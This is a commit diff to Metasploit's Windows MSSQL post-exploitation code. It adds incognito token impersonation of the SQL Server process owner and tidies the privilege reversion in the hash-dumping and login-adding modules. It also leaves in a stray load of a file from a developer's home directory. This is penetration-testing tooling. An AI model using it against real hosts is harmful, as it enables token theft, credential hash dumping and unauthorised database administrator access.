Use incognito token stealing rather than process migration if we have

the privileges required for successful impersonation.

lib/msf/core/post/windows/mssql.rb

@@ -100,10 +100,32 @@ module MSSQL
   def impersonate_sql_user(service)
     pid = service[:pid]
     vprint_status("Current user: #{session.sys.config.getuid}")
+    current_privs = client.sys.config.getprivs
+    if current_privs.include?('SeImpersonatePrivilege') ||
+       current_privs.include?('SeTcbPrivilege') ||
+       current_privs.include?('SeAssignPrimaryTokenPrivilege')
+      username = nil
+      session.sys.process.each_process do |process|
+        if process['pid'] == pid
+          username = process['user']
+          break
+        end
+      end
 
+      session.core.use('incognito') unless session.incognito
+      vprint_status("Attemping to impersonate user: #{username}")
+      res = session.incognito.incognito_impersonate_token(username)
+
+      if res =~ /Successfully/i
+        print_good("Impersonated user: #{username}")
+        return true
+      else
+        return false
+      end
+    else
       # Attempt to migrate to target sqlservr.exe process
       # Migrating works, but I can't rev2self after its complete
-    print_warning("Attempting to migrate to process #{pid}...")
+      print_warning("No SeImpersonatePrivilege, attempting to migrate to process #{pid}...")
       begin
         session.core.migrate(pid)
       rescue Rex::RuntimeError => e
@@ -113,6 +135,7 @@ module MSSQL
 
       vprint_status("Current user: #{session.sys.config.getuid}")
       print_good("Successfully migrated to sqlservr.exe process #{pid}")
+    end
 
     true
   end

modules/post/windows/gather/credentials/mssql_local_hashdump.rb

@@ -47,6 +47,7 @@ class Metasploit3 < Msf::Post
     system_status = get_system
     fail_with(Exploit::Failure::Unknown, 'Unable to get SYSTEM') unless system_status
 
+    begin
       service = check_for_sqlserver(instance)
       fail_with(Exploit::Failure::Unknown, 'Unable to identify MSSQL Service') unless service
 
@@ -61,10 +62,11 @@ class Metasploit3 < Msf::Post
           get_sql_hash(instance_name)
         end
       end
-
+    ensure
       # return to original priv context
       session.sys.config.revert_to_self
     end
+  end
 
   def get_sql_version(instance_name)
     vprint_status("Attempting to get version...")

modules/post/windows/manage/mssql_local_auth_bypass.rb

@@ -6,7 +6,7 @@
 require 'msf/core'
 require 'rex'
 require 'msf/core/post/windows/mssql'
-
+load '/home/ben/git/metasploit-framework/lib/msf/core/post/windows/mssql.rb'
 class Metasploit3 < Msf::Post
 
   include Msf::Post::Windows::MSSQL
@@ -56,7 +56,7 @@ class Metasploit3 < Msf::Post
     # Get LocalSystem privileges
     system_status = get_system
     fail_with(Exploit::Failure::Unknown, 'Unable to get SYSTEM') unless system_status
-
+    begin
       service = check_for_sqlserver(instance)
       fail_with(Exploit::Failure::Unknown, 'Unable to identify MSSQL Service') unless service
 
@@ -68,10 +68,11 @@ class Metasploit3 < Msf::Post
       else
         add_login(service, instance_name)
       end
-
+    ensure
       # attempt to return to original priv context
       session.sys.config.revert_to_self
     end
+  end
 
   def add_login(service, instance_name)
     begin